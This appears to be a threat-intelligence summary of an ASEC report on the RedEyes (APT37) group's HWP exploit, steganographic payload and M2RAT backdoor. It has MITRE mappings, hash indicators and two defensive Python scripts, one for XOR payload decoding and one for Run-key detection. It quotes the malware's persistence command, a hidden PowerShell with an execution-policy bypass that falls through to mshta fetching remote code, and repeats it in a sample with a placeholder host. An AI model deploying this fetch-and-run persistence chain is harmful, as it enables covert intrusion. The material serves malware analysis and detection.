HWP Malware Using the Steganography Technique: RedEyes (ScarCruft) – ASEC BLOG

ASEC reports that the RedEyes group (ScarCruft/APT37) targeted individuals in Korea by exploiting the CVE-2017-8291 HWP EPS vulnerability and delivering malware via steganography. They reveal a new backdoor, M2RAT (Map2RAT), that uses a shared memory channel and registry-based persistence to exfiltrate data and control infected devices, including mobile phones.
#RedEyes #ScarCruft #APT37 #M2RAT #Map2RAT #Chinotto #CVE-2017-8291 #HWP #EPS #Wallup

Keypoints

  • The RedEyes group targets individuals (not corporations) and steals personal PC and mobile data.
  • Attackers exploit the old HWP EPS vulnerability CVE-2017-8291 using steganography to distribute malware.
  • The steganographic image carrying the payload was sourced from wallup.net.
  • A new backdoor, M2RAT (Map2RAT), is deployed after the loader runs and is injected into explorer.exe, enabling remote control and exfiltration.
  • Persistence is achieved via a registry Run key (RyPO) to maintain a connection with the C2 server, similar to past ScarCruft activity.
  • The operation includes C2 communications, data exfiltration, and mobile data theft, with a focus on evading network detection.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – The HWP EPS vulnerability allowed the threat actor’s shellcode to run through the third-party module. Quote: ‘the vulnerability allows the threat actor’s shellcode to run through the third-party module.’
  • [T1027.001] Steganography – The threat actor used the steganography technique to embed a malware strain within an image. Quote: ‘the threat actor used the steganography technique to embed a malware strain within an image.’
  • [T1218.005] Mshta – The registry Run key command uses mshta to fetch and execute remote content. Quote: ‘mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html’
  • [T1059.001] PowerShell – PowerShell is launched with a hidden window and execution policy bypass as part of the persistence command. Quote: ‘PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 340328 2.2.2.2 || mshta hxxps://www.*******elearning.or[.]kr/popup/handle/1.html’
  • [T1547.001] Registry Run Keys/Startup Folder – The lskdjfel.exe file registers a Run key to establish persistence. Quote: ‘The executed lskdjfel.exe file registers the following command to the registry Run key to establish a persistent connection with the threat actor’s server.’
  • [T1055] Process Injection – The backdoor is injected into explorer.exe. Quote: ‘The ultimately executed backdoor operates after being injected into explorer.exe.’
  • [T1071.001] Web Protocols – C2 commands are carried in the body of HTTP POST requests. Quote: ‘M2RAT’s C&C communications command system involves receiving commands from the threat actor’s server through the POST method’s Body.’
  • [T1140] Deobfuscate/Decode Files or Information – A 16-byte XOR key, applied one byte at a time, decodes the PE payload. Quote: ‘16-byte XOR key is used for PE decoding to XOR 1 byte at a time.’
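The T1140 entry above describes a repeating 16-byte XOR key applied byte by byte to a PE payload. The following is an added analyst-side example, not code from the ASEC report or from the malware: it recovers such a key by known-plaintext (assuming the encoded payload begins with a standard, unmodified DOS header), decodes the blob, and verifies the result is a PE before accepting it. The sample key and the fake PE are constructed here for testing; the real key, image format and payload offset are not given on the page, so the code assumes the encoded blob has already been extracted from the carrier image.

```python
from typing import Optional

# First 16 bytes of a typical PE file (DOS header: e_magic "MZ", e_cblp, e_cp, e_crlc,
# e_cparhdr, e_minalloc, e_maxalloc). Assumption: the payload keeps this standard header.
PE_KNOWN_PREFIX = bytes.fromhex("4d5a90000300000004000000ffff0000")
KEY_LEN = 16  # key length stated in the report


def xor_bytes(blob: bytes, key: bytes) -> bytes:
    """XOR every byte of blob with the key, repeating the key (1 byte at a time)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob))


def recover_key(blob: bytes, known_prefix: bytes = PE_KNOWN_PREFIX) -> bytes:
    """Known-plaintext recovery: ciphertext[0:16] XOR plaintext[0:16] yields the whole key."""
    if len(blob) < KEY_LEN:
        raise ValueError("blob shorter than one key length")
    return bytes(c ^ p for c, p in zip(blob[:KEY_LEN], known_prefix[:KEY_LEN]))


def looks_like_pe(data: bytes) -> bool:
    """Minimal structural check: MZ magic plus a PE\\0\\0 signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def carve_pe(blob: bytes) -> Optional[bytes]:
    """Guess the key from the expected DOS header, decode, and return the PE if valid.

    Returns None when the guess does not produce a plausible PE (for example because
    the sample uses a non-standard DOS stub), so a wrong guess is never accepted silently.
    """
    key = recover_key(blob)
    decoded = xor_bytes(blob, key)
    return decoded if looks_like_pe(decoded) else None


# --- constructed test data (not from the report) -----------------------------------
def _build_fake_pe() -> bytes:
    """A minimal fake PE: DOS header with e_lfanew = 0x80, then a PE signature."""
    header = bytearray(PE_KNOWN_PREFIX) + bytes(0x40 - len(PE_KNOWN_PREFIX))
    header[0x3C:0x40] = (0x80).to_bytes(4, "little")
    return bytes(header) + bytes(0x80 - 0x40) + b"PE\0\0" + b"\x4c\x01" + bytes(0x100)


SAMPLE_KEY = bytes(range(0x10, 0x20))          # constructed 16-byte key, not the real one
SAMPLE_ENCODED = xor_bytes(_build_fake_pe(), SAMPLE_KEY)

if __name__ == "__main__":
    recovered = recover_key(SAMPLE_ENCODED)
    print("recovered key:", recovered.hex())
    pe = carve_pe(SAMPLE_ENCODED)
    print("valid PE decoded:", pe is not None)
```

For a real sample, read the extracted blob from disk and call `carve_pe` on it; if it returns None, the header assumption does not hold and the key must be obtained from the loader's code instead.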

Indicators of Compromise

  • [MD5] Detection hashes for dropper/loader and components – 8b666fc04af6de45c804d973583c76e0, 93c66ee424daf4c5590e21182592672e, 7bab405fbc6af65680443ae95c30595d, 9083c1ff01ad8fabbcd8af1b63b77e66, 4488c709970833b5043c0b0ea2ec9fa9, 7f5a72be826ea2fe5f11a16da0178e54
  • [File] Filenames associated with stages – Form.hwp (EPS document triggering the exploit) and lskdjfel.exe (decrypted PE loader / backdoor launcher)
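The persistence entries above (T1547.001, T1218.005, T1059.001) describe a Run key value that launches a hidden PowerShell which falls through to mshta fetching remote content. The following is an added detection example written for this summary, not code from ASEC or the report: it parses `reg query` style output for the Run key and flags values showing those traits. The sample output, the value name other than RyPO, the paths and the `example.invalid` host are all constructed; the redacted domain from the report is not used.

```python
import re
from typing import Dict, List

# Constructed sample in the layout printed by
#   reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
# The RyPO value mirrors the command structure quoted in the report with a placeholder host.
REG_QUERY_SAMPLE = """\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    RyPO    REG_SZ    PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 340328 2.2.2.2 || mshta https://example.invalid/popup/handle/1.html
    Updater    REG_EXPAND_SZ    mshta http://example.invalid/update.hta
"""

REG_LINE = re.compile(r"^\s+(.+?)\s+REG_(?:EXPAND_)?SZ\s+(.*)$")

MSHTA_REMOTE = re.compile(r"\bmshta(?:\.exe)?\b.*?https?://", re.I)
POWERSHELL = re.compile(r"\bpowershell(?:\.exe)?\b", re.I)
# PowerShell accepts abbreviated switches, so -w / -win / -WindowStyle all match.
HIDDEN_WINDOW = re.compile(r"-w\w*\s+hidden\b", re.I)
# -ep bypass / -ExecutionPolicy bypass
EP_BYPASS = re.compile(r"-e\w*\s+bypass\b", re.I)
# mshta placed after ||, i.e. executed when the preceding command fails
OR_CHAIN_MSHTA = re.compile(r"\|\|\s*mshta\b", re.I)


def parse_reg_query(text: str) -> Dict[str, str]:
    """Map Run value names to their command strings from reg query output."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            values[m.group(1)] = m.group(2)
    return values


def flag_run_value(command: str) -> List[str]:
    """Return the reasons a Run command looks like the persistence described in the report."""
    reasons: List[str] = []
    if MSHTA_REMOTE.search(command):
        reasons.append("mshta loading remote content")
    if POWERSHELL.search(command):
        if HIDDEN_WINDOW.search(command):
            reasons.append("PowerShell started with a hidden window")
        if EP_BYPASS.search(command):
            reasons.append("PowerShell execution policy bypassed")
    if OR_CHAIN_MSHTA.search(command):
        reasons.append("mshta chained with || so it runs when the preceding command fails")
    return reasons


def scan_run_values(values: Dict[str, str]) -> Dict[str, List[str]]:
    """Keep only the Run values that triggered at least one indicator."""
    return {name: r for name, cmd in values.items() if (r := flag_run_value(cmd))}


if __name__ == "__main__":
    for name, reasons in scan_run_values(parse_reg_query(REG_QUERY_SAMPLE)).items():
        print(f"{name}: {'; '.join(reasons)}")
```

On a live host, feed the function the output of `reg query` for both the HKCU and HKLM Run keys; a legitimate entry rarely combines a hidden PowerShell window, an execution-policy bypass and a remote mshta fetch in one value.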

Read more: https://asec.ahnlab.com/en/48063/